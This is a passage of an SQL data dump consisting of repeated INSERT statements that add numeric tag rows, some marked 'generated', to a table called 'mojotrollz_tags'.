10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181072, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181072, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181072, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181072, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181075, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181076, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181077, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181078, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181079, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181080, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181081, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181082, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181085, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181085, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181085, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181085, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181098, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181099, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181103, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181104, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181119, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181119, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181119, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181119, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181120, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181120, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181120, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181120, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181121, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181121, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181121, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181121, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181123, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181123, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181123, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181123, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181124, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181124, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181124, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181124, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181125, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181125, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181125, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181125, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181126, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181126, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181126, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181126, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181130, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181131, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181134, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181135, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181168, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181168, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181168, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181168, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181169, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181169, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181169, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181169, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181170, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181170, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181170, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181170, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181191, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181191, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181195, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181195, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181195, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181195, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181197, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181197, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181197, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181197, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181198, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181198, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181198, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181198, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181199, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181199, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181199, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181199, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181200, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181200, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181200, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181200, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181201, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181201, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181201, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181201, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181202, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181202, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181202, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181202, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181203, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181203, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181203, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181203, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181206, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181206, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181206, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181206, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181209, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181209, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181209, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181209, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181210, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181210, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181210, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181210, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181211, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181211, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181211, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181211, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181212, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181212, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181212, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181212, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181213, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181213, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181213, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181213, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181225, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181225, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181225, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181225, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181228, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181228, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181228, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181228, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181229, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181229, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181229, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181229, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181230, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181230, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181230, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181230, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181231, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181231, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181231, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181231, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181232, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181232, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181232, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181232, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181233, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181233, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181233, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181233, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181234, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181234, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181234, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181234, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181235, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181235, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181235, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181235, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181236, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181240, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181240, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181240, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181240, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181241, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181241, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181241, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181241, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181242, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181242, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181242, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181242, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181243, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181243, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181243, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181243, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181257, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181287, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181287, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181287, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181287, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181302, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181305, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181306, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181307, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181332, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181333, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181334, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181335, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181336, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181337, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181354, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181355, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181356, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181356, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181356, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181356, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181358, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181366, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181366, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181366, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181366, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181376, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181388, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181389, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181390, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181391, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181392, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181393, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181401, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181402, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181402, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181402, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181402, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181403, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181403, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181403, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181403, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181404, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181404, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181404, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181404, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181405, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181405, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181405, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181405, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181431, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181476, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181477, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181477, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181477, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181477, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181478, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181478, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181478, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181478, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181496, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181496, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181496, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181496, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181510, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181510, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181510, 2, 4, 